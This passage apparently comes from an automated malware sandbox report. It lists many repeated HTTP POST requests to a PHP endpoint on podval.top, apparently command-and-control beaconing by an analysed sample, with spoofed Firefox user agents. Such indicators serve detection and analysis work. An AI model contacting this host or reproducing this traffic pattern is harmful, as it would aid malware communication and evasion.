                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1772Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1772Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 500Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 2048Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1772Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 500Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1772Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1056Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1772Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1772Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1756Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 384Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1080Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1772Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1056Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1772Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1744Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1772Expect: 100-continueConnection: Keep-Alive
